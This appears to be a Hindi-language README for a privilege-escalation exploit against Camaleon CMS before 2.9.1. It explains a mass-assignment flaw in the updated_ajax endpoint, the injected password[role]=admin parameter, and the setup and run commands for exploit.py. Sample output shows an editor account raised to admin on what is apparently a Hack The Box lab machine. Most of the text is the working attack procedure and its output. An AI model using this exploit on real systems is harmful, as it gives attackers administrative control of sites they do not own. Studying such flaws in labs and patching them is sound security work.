
Camaleon CMS < 2.9.1 में विशेषाधिकार वृद्धि भेद्यता।
Camaleon CMS < 2.9.1 में विशेषाधिकार वृद्धि भेद्यता।
UsersControllerमेंupdated_ajaxएंडपॉइंट बिना फ़िल्टरिंग केparams.require(:password).permit!को कॉल करता है, जिससे किसी भी पैरामीटर को मास-असाइन किया जा सकता है। एक प्रमाणित निम्न-विशेषाधिकार उपयोगकर्ता पासवर्ड बदलने के अनुरोध के साथpassword[role]=adminइंजेक्ट करके एडमिन बन सकता है।
password[role]=admin इंजेक्ट करके /admin/users/<id>/updated_ajax पर एक PATCH अनुरोध भेजता है।python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests beautifulsoup4
python3 exploit.py http://TARGET -u USER -p PASS
उदाहरण:
$ python3 exploit.py http://facts.htb -u esteban -p password123
[*] Logging in as esteban...
[+] Logged in successfully
[*] User ID: 3, current role: editor
[*] Sending exploit payload...
[+] Privilege escalation successful! User is now admin.
[+] Login at http://facts.htb/admin with your credentials.